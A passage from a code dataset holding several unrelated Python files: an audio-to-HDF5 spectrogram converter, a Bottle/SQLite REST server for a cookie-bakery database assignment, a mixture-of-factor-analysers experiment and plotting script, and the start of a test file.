sampling_rate)\n freq, time, stft = spectrogram(\n input_signal, fs=self.__INPUT_SAMPLING_RATE,\n window=get_window(self.__WINDOW, self.__N_SAMPLES_WINDOW),\n # nperseg=None,\n noverlap=self.__N_SAMPLES_OVERLAP, nfft=self.__N_SAMPLES_WINDOW,\n # detrend='constant',\n return_onesided=True, scaling='spectrum', axis=-1, mode='complex')\n db_values = amplitude_to_db(np.abs(stft))\n db_values = np.transpose(db_values)[:, np.newaxis, :]\n phase = np.angle(stft)\n return [freq, time, db_values, phase]\n\n def __store_h5_data(self, main_group, file_combination, clean_info, noise_info,\n clean_freq, clean_time, clean_db, clean_phase,\n dirty_freq, dirty_time, dirty_db, dirty_phase):\n combination_group = main_group.create_group(np.string_('COMBINATION@ID_%d' % file_combination[0]))\n combination_group.attrs.create(np.string_('COMBINATION@ID'), np.int32(file_combination[0]))\n combination_group.attrs.create(np.string_('COMBINATION@SAMPLE_RATE'), np.float64(self.__INPUT_SAMPLING_RATE))\n 
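        # Provenance metadata for this clean/noise combination. Wrapping every
        # attribute key in np.string_ makes h5py store it as a fixed-length
        # byte string, which keeps the attributes readable from non-Python HDF5
        # tools; the CLEAN@* and NOISE@* attributes below mirror the matching
        # database rows returned by audioBookGetById/noiseGetById.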
combination_group.attrs.create(np.string_('CLEAN@ID'), np.int32(clean_info[0]))\n combination_group.attrs.create(np.string_('CLEAN@BOOK_DUMMY_NAME'), np.string_(clean_info[1]))\n combination_group.attrs.create(np.string_('CLEAN@BOOK_NAME'), clean_info[2])\n combination_group.attrs.create(np.string_('CLEAN@BOOK_AUTHOR'), clean_info[3])\n combination_group.attrs.create(np.string_('CLEAN@BOOK_URL'), np.string_(clean_info[4]))\n combination_group.attrs.create(np.string_('CLEAN@BOOK_LANGUAGE'), clean_info[5])\n combination_group.attrs.create(np.string_('CLEAN@BOOK_N_TRACK'), np.int32(clean_info[7]))\n combination_group.attrs.create(np.string_('CLEAN@TRACK_NAME'), np.string_(clean_info[8]))\n combination_group.attrs.create(np.string_('CLEAN@TRACK_SAMPLE_RATE'), np.float64(clean_info[11]))\n combination_group.attrs.create(np.string_('NOISE@ID'), np.int32(noise_info[0]))\n combination_group.attrs.create(np.string_('NOISE@NAME'), noise_info[1])\n combination_group.attrs.create(np.string_('NOISE@URL'), np.string_(noise_info[2]))\n combination_group.attrs.create(np.string_('NOISE@ORIGINAL_N_CHANNEL'), np.int8(noise_info[4]))\n combination_group.attrs.create(np.string_('NOISE@ORIGINAL_SAMPLE_RATE'), np.float64(noise_info[5]))\n clean_group = combination_group.create_group(r'CLEAN')\n clean_group.create_dataset('FREQ', data=clean_freq)\n clean_group.create_dataset('TIME', data=clean_time)\n clean_group.create_dataset('DB', data=clean_db)\n clean_group.create_dataset('PHASE', data=clean_phase)\n clean_group.attrs.create(np.string_('FFT@SIZE'), np.int32(self.__N_SAMPLES_WINDOW))\n clean_group.attrs.create(np.string_('FFT@N_SAMPLES_OVERLAP'), np.int32(self.__N_SAMPLES_OVERLAP))\n clean_group.attrs.create(np.string_('FFT@WINDOW'), np.string_(self.__WINDOW))\n dirty_group = combination_group.create_group(r'DIRTY')\n dirty_group.create_dataset('FREQ', data=dirty_freq)\n dirty_group.create_dataset('TIME', data=dirty_time)\n dirty_group.create_dataset('DB', data=dirty_db)\n dirty_group.create_dataset('PHASE', data=dirty_phase)\n dirty_group.attrs.create(np.string_('FFT@SIZE'), np.int32(self.__N_SAMPLES_WINDOW))\n dirty_group.attrs.create(np.string_('FFT@N_SAMPLES_OVERLAP'), np.int32(self.__N_SAMPLES_OVERLAP))\n dirty_group.attrs.create(np.string_('FFT@WINDOW'), np.string_(self.__WINDOW))\n\n @staticmethod\n def load_audio(path, normalized=True):\n ext = os.path.splitext(path)[1][1:]\n logging.info('Loading audio ' + path + ' with file type ' + ext)\n rawSound = AudioSegment.from_file(path, ext)\n if rawSound.channels != 1:\n logging.info('Audio contains more than one channel. 
Setting to single channel')\n rawSound = rawSound.set_channels(1)\n if normalized:\n logging.info('Normalize audio')\n return effects.normalize(rawSound)\n else:\n return rawSound\n\n\nif __name__ == \"__main__\":\n try:\n # set up logging to file\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-20s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename='./DataConverter.log',\n filemode='w+')\n # define a Handler which writes DEBUG messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(asctime)s %(name)-20s %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n\n parser = ArgumentParser()\n parser.add_argument(\"-d\", \"--download\", action='count', help=\"Download data and log into database\", default=0)\n parser.add_argument(\"-f\", \"--file\", help=\"H5 file name\", default='./h5_default.h5')\n parser.add_argument(\"-m\", \"--mode\", choices=['r', 'r+', 'w', 'a'], help=\"Mode of opening h5 file\", default='a')\n parser.add_argument(\"-n\", \"--noise\", help=\"Noises to mix in h5 file\", type=str, nargs='+',)\n parser.add_argument(\"-l\", \"--limit\", help=\"Number of tracks (0 means all)\", type=int, default=0, )\n args = parser.parse_args()\n\n logging.info('Starting program execution')\n data_manager = DataManager()\n data_manager.main(filename=args.file, mode=args.mode, download=args.download,\n noises=args.noise, limit=args.limit)\n except Exception as e:\n logging.error('Something was wrong', exc_info=True)\n","sub_path":"listings/DataConverter.py","file_name":"DataConverter.py","file_ext":"py","file_size_in_byte":11706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"476197028","text":"from bottle import get, post, run, request, response, delete, put\nimport sqlite3\nimport json\n\nHOST = 'localhost'\nPORT = 8888\n\nconn = sqlite3.connect(\"krustyDB.sqlite\")\n\n#---------------SOLVING THE ASSINGMENTS-----------------------------\n\n@post('/reset')\ndef reset():\n\n c = conn.cursor()\n c.execute(\n \"\"\"\n DELETE FROM cookies\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM ingredients\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM recipes\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM pallets\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM orders\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM cookie_orders\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM customers\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT\n INTO cookies(name)\n VALUES ('Nut ring'),\n ('Nut cookie'),\n ('Amneris'),\n ('Tango'),\n ('Almond delight'),\n ('Berliner')\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT\n INTO ingredients(name, quantity_in_stock, unit)\n VALUES ('Flour', 100000, 'g'),\n ('Butter', 100000, 'g'),\n ('Icing sugar', 100000, 'g'),\n ('Roasted, chopped nuts', 100000, 'g'),\n ('Fine-ground nuts', 100000, 'g'),\n ('Ground, roasted nuts', 100000, 'g'),\n ('Bread crumbs', 100000, 'g'),\n ('Sugar', 100000, 'g'),\n ('Egg whites', 100000, 'ml'),\n ('Chocolate', 100000, 'g'),\n ('Marzipan',100000, 'g'),\n ('Eggs', 100000, 'g'),\n ('Potato starch', 100000, 'g'),\n ('Wheat flour', 100000, 'g'),\n ('Sodium bicarbonate', 100000, 'g'),\n ('Vanilla', 100000, 'g'),\n ('Chopped almonds', 100000, 'g'),\n ('Cinnamon', 100000, 'g'),\n ('Vanilla sugar', 
100000, 'g')\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT\n INTO recipes(cookie, ingredient, quantity)\n VALUES ('Nut ring','Flour',450),\n ('Nut ring','Butter',450),\n ('Nut ring','Icing sugar',190),\n ('Nut ring','Roasted, chopped nuts',225),\n ('Nut cookie','Fine-ground nuts',750),\n ('Nut cookie','Ground, roasted nuts',625),\n ('Nut cookie','Bread crumbs',125),\n ('Nut cookie','Sugar',375),\n ('Nut cookie','Egg whites',350),\n ('Nut cookie','Chocolate',50),\n ('Amneris','Marzipan',750),\n ('Amneris','Butter',250),\n ('Amneris','Eggs',250),\n ('Amneris','Potato starch',25),\n ('Amneris','Wheat flour',25),\n ('Tango','Butter',200),\n ('Tango','Sugar',250),\n ('Tango','Flour',300),\n ('Tango','Sodium bicarbonate',4),\n ('Tango','Vanilla',2),\n ('Almond delight','Butter',400),\n ('Almond delight','Sugar',270),\n ('Almond delight','Chopped almonds',279),\n ('Almond delight','Flour',400),\n ('Almond delight','Cinnamon',10),\n ('Berliner','Flour',350),\n ('Berliner','Butter',250),\n ('Berliner','Icing sugar',100),\n ('Berliner','Eggs',50),\n ('Berliner','Vanilla sugar',5),\n ('Berliner','Chocolate',50)\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT\n INTO customers(name, address)\n VALUES ('Finkakor AB', 'Helsingborg'),\n ('Smabrod AB', 'Malmo'),\n ('Kaffebrod AB', 'Landskrona'),\n ('Bjudkakor AB', 'Ystad'),\n ('Kalaskakor AB', 'Trelleborg'),\n ('Partykakor AB', 'Kristianstad'),\n ('Gastkakor AB', 'Hassleholm'),\n ('Skanekakor AB', 'Perstorp')\n \"\"\"\n )\n conn.commit()\n c.close()\n response.status = 200\n return json.dumps({\"status\": \"ok\"}, indent=4)\n\n@get('/customers')\ndef customers():\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT name, address\n FROM customers\n\tORDER BY name\n \"\"\"\n )\n s = [{\"name\": name, \"address\": address}\n for (name, address,) in c]\n return json.dumps({\"customers\": s}, indent=4)\n\n@get('/ingredients')\ndef ingredients():\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT name, quantity_in_stock, unit\n FROM ingredients\n\tORDER BY name\n \"\"\"\n )\n s = [{\"name\": name, \"quantity\": quantity_in_stock, \"unit\": unit}\n for (name, quantity_in_stock, unit,) in c]\n return json.dumps({\"ingredients\": s}, indent=4)\n\n@get('/cookies')\ndef cookies():\n c = conn.cursor()\n lista = c.execute(\n \"\"\"\n SELECT name\n FROM cookies\n\tORDER BY name\n \"\"\"\n )\n\n s = [{\"name\": name}\n for (name,) in c]\n return json.dumps({\"cookies\": s}, indent=4)\n\n@get('/recipes')\ndef recipes():\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT cookie, recipes.ingredient, quantity, unit\n FROM recipes\n\tJOIN ingredients\n\tON ingredients.name = recipes.ingredient\n\tORDER BY cookie, recipes.ingredient\n \"\"\"\n )\n s = [{\"cookie\": cookie, \"ingredient\": recipes.ingredient,\"quantity\": quantity,\"unit\": unit}\n for (cookie, recipes.ingredient, quantity, unit,) in c]\n return json.dumps({\"recipes\": s}, indent=4)\n\n@get('/pallets')\ndef get_pallets():\n response.content_type= 'application/json'\n query = \"\"\"\n SELECT pallet_id, cookie, produced, name, blocked\n FROM pallets\n LEFT JOIN orders\n USING (order_id)\n WHERE 1 = 1\n \"\"\"\n params = []\n if request.query.cookie:\n query += \"AND cookie = ?\"\n params.append(request.query.cookie)\n if request.query.blocked:\n query += \"AND blocked = ?\"\n params.append(request.query.blocked)\n if request.query.after:\n query += \"AND produced > ?\"\n params.append(request.query.after)\n if request.query.before:\n query += \"AND produced < ?\"\n params.append(request.query.before)\n c = 
conn.cursor()\n c.execute(\n query,\n params\n )\n s = [{\"id\":pallet_id, \"cookie\":cookie,\"productionDate\":produced,\"customer\":name,\"blocked\":blocked}\n for(pallet_id, cookie, produced, name, blocked,) in c]\n response.status = 200\n return json.dumps({\"pallets\": s}, indent=4)\n\n@post('/pallets')\ndef post_pallets():\n response.content_type= 'application/json'\n cookie = request.query.cookie\n c = conn.cursor()\n cookieList = c.execute(\n \"\"\"\n SELECT name\n FROM cookies\n WHERE name = ?\n \"\"\"\n ,\n [cookie]\n ).fetchall()\n\n if len(cookieList) == 0:\n s = {\"status\": \"no such cookie\"}\n c.close()\n response.status = 400\n return json.dumps(s, indent=4)\n else:\n try:\n c.execute(\n \"\"\"\n WITH ingredients_needed AS(\n SELECT ingredient\n FROM recipes\n WHERE cookie = ?\n )\n UPDATE ingredients\n SET quantity_in_stock = quantity_in_stock - 54*(SELECT quantity\n FROM recipes\n WHERE cookie = ?\n AND ingredients.name = recipes.ingredient)\n WHERE name IN ingredients_needed\n \"\"\"\n ,\n [cookie, cookie]\n )\n except:\n s = {\"status\": \"not enough ingredients\"}\n c.close()\n response.status = 400\n return json.dumps(s, indent=4)\n c.execute(\n \"\"\"\n INSERT\n INTO pallets (cookie)\n VALUES (?)\n \"\"\"\n ,\n [cookie]\n )\n conn.commit()\n c.execute(\n \"\"\"\n SELECT pallet_id\n FROM pallets\n WHERE rowid = last_insert_rowid()\n \"\"\"\n )\n id = c.fetchone()[0]\n s = {\"status\": \"ok\", \"id\": id}\n c.close()\n response.status = 200\n return json.dumps(s, indent=4)\n\n\n@post('/block/<cookie>/<from_date>/<to_date>')\ndef block(cookie, from_date, to_date):\n\tc = conn.cursor()\n\tc.execute(\n\t\"\"\"\n\tUPDATE pallets\n\tSET blocked = 1\n\tWHERE cookie = ?\n\t\tAND produced >= ?\n\t\t\tAND produced <= ?\n\t\"\"\"\n\t,\n\t[cookie, from_date, to_date]\n\t)\n\ts = [{\"status\": \"ok\"}]\n\tc.close()\n\tresponse.status = 200\n\treturn json.dumps({\"status\": \"ok\"}, indent=4)\n\n\n@post('/unblock/<cookie>/<from_date>/<to_date>')\ndef unblock(cookie, from_date, to_date):\n\tc = conn.cursor()\n\tc.execute(\n\t\"\"\"\n\tUPDATE pallets\n\tSET blocked = 0\n\tWHERE cookie = ?\n\t\tAND produced >= ?\n\t\t\tAND produced <= ?\n\t\"\"\"\n\t,\n\t[cookie, from_date, to_date]\n\t)\n\ts = [{\"status\": \"ok\"}]\n\tc.close()\n\tresponse.status = 200\n\treturn json.dumps({\"status\": \"ok\"}, indent=4)\n\nrun(host=HOST, port=PORT, reloader=True, debug=True)","sub_path":"krusty_server.py","file_name":"krusty_server.py","file_ext":"py","file_size_in_byte":8965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"493184666","text":"\nimport sys\nimport numpy as np\nimport os\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nfrom time import time\n\nsys.path.insert(0, \"../\")\n\nfrom mcfa import (mcfa, grid_search, mpl_utils, utils)\n\nmatplotlib.style.use(mpl_utils.mpl_style)\ncolors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\n\nn_features = D = 15\nn_components = K = 10\nn_latent_factors = J = 5\nn_samples = N = 10_000\n\nomega_scale = 1\nnoise_scale = 1\nrandom_seed = 100\n\ndata_kwds = dict(n_features=n_features,\n n_components=n_components,\n n_latent_factors=n_latent_factors,\n n_samples=n_samples,\n omega_scale=omega_scale,\n noise_scale=noise_scale,\n random_seed=random_seed)\n\n\ndef savefig(fig, suffix):\n prefix = os.path.basename(__file__)[:-3]\n here = os.path.dirname(os.path.realpath(__file__))\n filename = os.path.join(here, f\"{prefix}-{suffix}\")\n 
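    # Persist both formats: a high-resolution PDF for the article and a
    # lighter PNG for quick inspection (the two calls differ only in dpi).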
fig.savefig(f\"{filename}.pdf\", dpi=300)\n fig.savefig(f\"{filename}.png\", dpi=150)\n print(f\"Created figures {filename}.png and {filename}.pdf\")\n\n\nmcfa_kwds = dict(tol=1e-5, \n max_iter=1_000,\n init_factors=\"random\",\n init_components=\"random\",\n random_seed=random_seed)\n\n\n\n\nY, truth = utils.generate_data(**data_kwds)\ntruth_packed = (truth[\"pi\"], truth[\"A\"], truth[\"xi\"], truth[\"omega\"], truth[\"psi\"])\n\n\n# Fit with true number of latent factors and components.\nmodel = mcfa.MCFA(n_components=data_kwds[\"n_components\"],\n n_latent_factors=data_kwds[\"n_latent_factors\"],\n **mcfa_kwds)\ntick = time()\nmodel.fit(Y)\ntock = time()\n\nmodel.message_length(Y)\n\nprint(f\"Model took {tock - tick:.1f} seconds\")\n\n\n# Plot the true latent factors w.r.t. the estimated ones, after rotation.\nA_true = truth[\"A\"]\nA_est = model.theta_[model.parameter_names.index(\"A\")]\n\n#R, *_ = utils.find_rotation_matrix(A_true, A_est, n_inits=100)\n\n# Get exact transformation.\nR = utils.exact_rotation_matrix(A_true, A_est)\n\n# Now make it a valid rotation matrix.\nL = linalg.cholesky(R.T @ R)\nR = R @ linalg.solve(L, np.eye(n_latent_factors))\n\n\nA_est_rot = A_est @ R\n\n\nD, J = A_true.shape\nxi = 1 + np.arange(D)\n\nfig_factor_loads, ax = plt.subplots()\n\nfor j in range(J):\n ax.plot(xi, A_est.T[j], \":\", lw=1, c=colors[j])\n ax.plot(xi, A_est_rot.T[j], \"-\", lw=1, c=colors[j])\n ax.plot(xi, A_true.T[j], \"-\", lw=2, c=colors[j])\n\nax.set_xticks(xi)\nax.set_xlabel(r\"$\\textrm{dimension}$\")\nax.set_ylabel(r\"$\\mathbf{L}$\")\n\nylim = np.ceil(10 * np.abs(ax.get_ylim()).max()) / 10\nax.plot([0, D + 1], [0, 0], \":\", c=\"#000000\", zorder=-1, lw=0.5)\nax.set_xlim(0.5, D + 0.5)\n\nax.set_ylim(-ylim, +ylim)\nax.set_yticks([-ylim, 0, ylim])\n\nfig_factor_loads.tight_layout()\nsavefig(fig_factor_loads, \"factor_loads\")\n\n\n\n# Plot the latent space.\ncmap = mpl_utils.discrete_cmap(n_components, \"Spectral\")\n\nlabel_names = [f\"$\\\\mathbf{{S}}_{{{i}}}$\" for i in range(n_latent_factors)]\nfig_latent = mpl_utils.plot_latent_space(model, Y, cmap=cmap,\n label_names=label_names)\nfor ax in fig_latent.axes:\n if ax.get_visible():\n if ax.is_last_row():\n ax.xaxis.set_major_locator(MaxNLocator(3))\n if ax.is_first_col():\n ax.yaxis.set_major_locator(MaxNLocator(3))\n\n xlim = np.max(np.abs(ax.get_xlim()))\n ylim = np.max(np.abs(ax.get_ylim()))\n ax.set_xlim(-xlim, +xlim)\n ax.set_ylim(-ylim, +ylim)\nfig_latent.tight_layout()\nfig_latent.subplots_adjust(hspace=0, wspace=0)\nsavefig(fig_latent, \"latent\")\n\n\n\nll, tau = model.expectation(Y, *model.theta_)\n\nmodel.rotate(R)\n\nll2, tau = model.expectation(Y, *model.theta_)\n\nprint(f\"Difference in log-likeihood after rotation: {ll - ll2}\")\n\n\n# Take model with true number of components and latent factors.\n\nscatter_kwds = dict(s=25, rasterized=True, c=\"tab:blue\")\n\n\n# Compare factor loads to true values.\nfrom matplotlib import gridspec\n\nfig = plt.figure()\ngs = gridspec.GridSpec(2, 1, height_ratios=[1, 4])\n\nax_residual = fig.add_subplot(gs[0])\nax = fig.add_subplot(gs[1])\n\nA_est = model.theta_[model.parameter_names.index(\"A\")]\n\nx, y = (A_true.flatten(), A_est.flatten())\nax.scatter(x, y, **scatter_kwds)\nax_residual.scatter(x, y - x, **scatter_kwds)\n\nlims =lims = np.max(np.abs(np.hstack([ax.get_xlim(), ax.get_ylim()])))\nkwds = dict(c=\"#666666\", linestyle=\":\", linewidth=0.5, zorder=-1)\nax.plot([-lims, +lims], [-lims, +lims], \"-\", **kwds)\nax_residual.plot([-lims, +lims], [0, 0], \"-\", 
**kwds)\n\n\nax.set_xlim(-lims, +lims)\nax.set_ylim(-lims, +lims)\nax_residual.set_xlim(-lims, +lims)\nylim = np.max(np.abs(ax_residual.get_ylim()))\nax_residual.set_ylim(-ylim, +ylim)\n\n\nax_residual.yaxis.set_major_locator(MaxNLocator(3))\nax_residual.xaxis.set_major_locator(MaxNLocator(5))\nax.xaxis.set_major_locator(MaxNLocator(5))\nax.yaxis.set_major_locator(MaxNLocator(5))\n\nax_residual.set_xticks([])\n\nax.set_xlabel(r\"$\\mathbf{L}_\\textrm{true}$\")\nax.set_ylabel(r\"$\\mathbf{L}_\\textrm{est}$\")\nax_residual.set_ylabel(r\"$\\Delta\\mathbf{L}$\")\n\nfig.tight_layout()\n\nsavefig(fig, \"compare-loads\")\n\n\n# Compare factor scores to true values.\nx = truth[\"scores\"].flatten()\ny = model.factor_scores(Y)[1].flatten()\n \n\n# Compare factor loads to true values.\nfig = plt.figure()\ngs = gridspec.GridSpec(2, 1, height_ratios=[1, 4])\n\nax_residual = fig.add_subplot(gs[0])\nax = fig.add_subplot(gs[1])\n\nax.scatter(x, y, **scatter_kwds)\nax_residual.scatter(x, y - x, **scatter_kwds)\n\nlims = np.max(np.abs(np.hstack([ax.get_xlim(), ax.get_ylim()])))\nkwds = dict(c=\"#666666\", linestyle=\":\", linewidth=0.5, zorder=-1)\nax.plot([-lims, +lims], [-lims, +lims], \"-\", **kwds)\nax_residual.plot([-lims, +lims], [0, 0], \"-\", **kwds)\n\nax.set_xlim(-lims, +lims)\nax.set_ylim(-lims, +lims)\nax_residual.set_xlim(-lims, +lims)\nylim = np.max(np.abs(ax_residual.get_ylim()))\nax_residual.set_ylim(-ylim, +ylim)\n\nax_residual.yaxis.set_major_locator(MaxNLocator(3))\nax_residual.xaxis.set_major_locator(MaxNLocator(5))\nax.xaxis.set_major_locator(MaxNLocator(5))\nax.yaxis.set_major_locator(MaxNLocator(5))\nax_residual.set_xticks([])\n\n\nax.set_xlabel(r\"$\\mathbf{S}_\\textrm{true}$\")\nax.set_ylabel(r\"$\\mathbf{S}_\\textrm{est}$\")\nax_residual.set_ylabel(r\"$\\Delta\\mathbf{S}$\")\n\nfig.tight_layout()\n\nsavefig(fig, \"compare-scores\")\n\n\n# Compare specific scatter values to true values.\nx = truth[\"psi\"].flatten()\ny = model.theta_[-1]\n\n\nfig = plt.figure()\ngs = gridspec.GridSpec(2, 1, height_ratios=[1, 4])\n\nax_residual = fig.add_subplot(gs[0])\nax = fig.add_subplot(gs[1])\n\n\nax.scatter(x, y, **scatter_kwds)\nax_residual.scatter(x, y - x, **scatter_kwds)\n\nlims = np.max(np.abs(np.hstack([ax.get_xlim(), ax.get_ylim()])))\nkwds = dict(c=\"#666666\", linestyle=\":\", linewidth=0.5, zorder=-1)\nax.plot([-lims, +lims], [-lims, +lims], \"-\", **kwds)\nax_residual.plot([-lims, +lims], [0, 0], \"-\", **kwds)\n\nax.set_xlim(0, +lims)\nax.set_ylim(0, +lims)\nax_residual.set_xlim(0, lims)\nylim = np.max(np.abs(ax_residual.get_ylim()))\nax_residual.set_ylim(-ylim, +ylim)\n\nax_residual.yaxis.set_major_locator(MaxNLocator(3))\nax_residual.xaxis.set_major_locator(MaxNLocator(5))\nax.xaxis.set_major_locator(MaxNLocator(5))\nax.yaxis.set_major_locator(MaxNLocator(5))\nax_residual.set_xticks([])\n\n\nax.set_xlabel(r\"$\\mathbf{D}_\\textrm{true}$\")\nax.set_ylabel(r\"$\\mathbf{D}_\\textrm{est}$\")\nax_residual.set_ylabel(r\"$\\Delta\\mathbf{D}$\")\n\nfig.tight_layout()\n\nsavefig(fig, \"compare-specific-scatter\")\n\n\n\n\nscatter_kwds = dict(s=1, rasterized=True, c=\"#000000\")\n\nfig = plt.figure(figsize=(7.5, 3.09))\n\n\ngs = gridspec.GridSpec(2, 3, height_ratios=[1, 4], width_ratios=[1, 1, 1])\n\nA_est = model.theta_[model.parameter_names.index(\"A\")]\n\nxs = [\n A_true.flatten(),\n truth[\"scores\"].flatten(),\n truth[\"psi\"].flatten()\n]\n\nys = [\n A_est.flatten(),\n model.factor_scores(Y)[1].flatten(),\n model.theta_[-1]\n]\n\nxlabels = [\n r\"$\\mathbf{L}_\\textrm{true}$\",\n 
r\"$\\mathbf{S}_\\textrm{true}$\",\n r\"$\\mathbf{D}_\\textrm{true}$\"\n]\n\nylabels = [\n r\"$\\mathbf{L}_\\textrm{est}$\",\n r\"$\\mathbf{S}_\\textrm{est}$\",\n r\"$\\mathbf{D}_\\textrm{est}$\"\n]\n\ndelta_labels = [\n r\"$\\Delta\\mathbf{L}$\",\n r\"$\\Delta\\mathbf{S}$\",\n r\"$\\Delta\\mathbf{D}$\"\n]\n\nidx = 0\nfor i in range(3):\n ax_residual = fig.add_subplot(gs[idx])\n ax = fig.add_subplot(gs[idx +3])\n\n x, y = (xs[i], ys[i])\n\n ax.scatter(x, y, **scatter_kwds)\n ax_residual.scatter(x, y - x, **scatter_kwds)\n\n lims = np.max(np.abs(np.hstack([ax.get_xlim(), ax.get_ylim()])))\n if i == 2:\n lims = (0, +lims)\n else:\n lims = (-lims, +lims)\n\n kwds = dict(c=\"#666666\", linestyle=\":\", linewidth=0.5, zorder=-1)\n ax.plot([lims[0], +lims[1]], [lims[0], +lims[1]], \"-\", **kwds)\n ax_residual.plot([lims[0], +lims[1]], [0, 0], \"-\", **kwds)\n\n ax.set_xlim(lims[0], +lims[1])\n ax.set_ylim(lims[0], +lims[1])\n ax_residual.set_xlim(lims[0], +lims[1])\n ylim = np.max(np.abs(ax_residual.get_ylim()))\n ax_residual.set_ylim(-ylim, +ylim)\n\n ax_residual.yaxis.set_major_locator(MaxNLocator(3))\n ax_residual.xaxis.set_major_locator(MaxNLocator(3))\n ax.xaxis.set_major_locator(MaxNLocator(3))\n ax.yaxis.set_major_locator(MaxNLocator(3))\n ax_residual.set_xticks([])\n\n\n ax.set_xlabel(xlabels[i])\n ax.set_ylabel(ylabels[i])\n ax_residual.set_ylabel(delta_labels[i])\n\n #ax.set_aspect(1.0)\n #ax_residual.set_aspect(1)\n idx += 1\n\nfig.tight_layout()\nsavefig(fig, \"compare-all\")\n\n\n\n# Plot the log-likelihood with increasing iterations.\nfig_iterations, ax = plt.subplots()\n\nll = np.array(model.log_likelihoods_)\niterations = 1 + np.arange(len(ll))\nax.plot(iterations, ll, \"-\", lw=2, drawstyle=\"steps-mid\")\nax.set_xlabel(r\"$\\textrm{iteration}$\")\nax.set_ylabel(r\"$\\log{\\mathcal{L}}$\")\nax.set_xlim(0, iterations[-1] + 1)\nax.xaxis.set_major_locator(MaxNLocator(6))\nax.yaxis.set_major_locator(MaxNLocator(6))\nxt = ax.get_xticks()\nax.set_xticks(xt + np.hstack([1, np.zeros(xt.size - 1)]))\nax.set_xlim(0, iterations[-1] + 1)\nfig_iterations.tight_layout()\nsavefig(fig_iterations, \"ll-iterations\")\n\n\n# Plot the data, with samples\nY_drawn = model.sample(data_kwds[\"n_samples\"])\nfig_data = mpl_utils.corner_scatter(Y, \n c=\"#000000\", s=1, alpha=0.5, figsize=(8, 8))\nmpl_utils.corner_scatter(Y_drawn,\n c=\"tab:blue\", s=1, alpha=0.25, zorder=10, fig=fig_data)\n\nfig_data.tight_layout()\nfig_data.subplots_adjust(hspace=0, wspace=0)\nsavefig(fig_data, \"data\")\n\n\n\n\n\n# Compare specific scatter to true values.\n# TODO:\n\n\n\nfig_data2 = mpl_utils.corner_scatter(Y, \n c=truth[\"R\"], cmap=\"Spectral\",\n s=1, alpha=0.5, figsize=(8, 8),\n label_names=[r\"$\\mathbf{{Y}}_{{{0}}}$\".format(i) for i in range(n_features)])\nfig_data2.tight_layout()\nfig_data2.subplots_adjust(hspace=0, wspace=0)\nsavefig(fig_data2, \"data-colour\")\n\n\ngridsearch_max_latent_factors = 10\ngridsearch_max_components = 20\n\n\n# Do a grid search.\n\nJm = np.arange(1, 1 + gridsearch_max_latent_factors)\nKm = np.arange(1, 1 + gridsearch_max_components)\nJ_grid, K_grid, converged, metrics = grid_search.grid_search(Jm, Km, Y,\n N_inits=1,\n mcfa_kwds=mcfa_kwds)\nll = metrics[\"ll\"]\nbic = metrics[\"bic\"]\nmml = metrics[\"message_length\"]\n\nidx = np.nanargmin(bic)\njm_b, km_b = Jm[idx % bic.shape[1]], Km[int(idx / bic.shape[1])]\n\nidx = np.nanargmin(mml)\njm_m, km_m = Jm[idx % mml.shape[1]], Km[int(idx / mml.shape[1])]\n\n\nJ_true, K_true = (data_kwds[\"n_latent_factors\"], 
data_kwds[\"n_components\"])\n\nprint(f\"BIC is lowest at J = {jm_b} and K = {km_b}\")\nprint(f\"MML is lowest at J = {jm_m} and K = {km_m}\")\n\nprint(f\"True values are J = {J_true} and K = {K_true}\")\n\n\n\nkwds = dict(converged=converged, \n marker_function=np.nanargmin, \n N=1000, \n cmap=\"Spectral_r\",\n truth=(J_true, K_true))\n\nfig_ll = mpl_utils.plot_filled_contours(J_grid, K_grid, -ll,\n colorbar_label=r\"$-\\log\\mathcal{L}(\\boldsymbol{\\mathbf{Y}}|\\boldsymbol{\\mathbf{D}})$\", \n **kwds)\nfig_ll.axes[0].set_yticks([1, 5, 10, 15, 20])\n\nfig_bic = mpl_utils.plot_filled_contours(J_grid, K_grid, bic,\n colorbar_label=r\"$\\textrm{BIC}$\", \n **kwds)\nfig_bic.axes[0].set_yticks([1, 5, 10, 15, 20])\n\n\nfig_mml = mpl_utils.plot_filled_contours(J_grid, K_grid, mml,\n colorbar_label=r\"$I\\left(\\boldsymbol{\\mathbf{Y}}|\\boldsymbol{\\mathbf{D}}\\right)$\", \n **kwds)\nfig_mml.axes[0].set_yticks([1, 5, 10, 15, 20])\n\n\nsavefig(fig_ll, \"gridsearch-ll-contours\")\nsavefig(fig_bic, \"gridsearch-bic-contours\")\nsavefig(fig_mml, \"gridsearch-mml-contours\")\n\n\n# Save grid search output in case we need it in future.\n","sub_path":"article/experiments/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":12979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"284666737","text":"import pythonpath\nfrom os import chdir, getcwd, walk\nfrom os.path import curdir, join, normpath\nimport photobatch as pb\nfrom photobatch import photobatch, PhotoBatchBug1, PhotoBatchBug2\nfrom prepare import main as prepare\nfrom unittest import TestCase, TestProgram\n\n_ls = 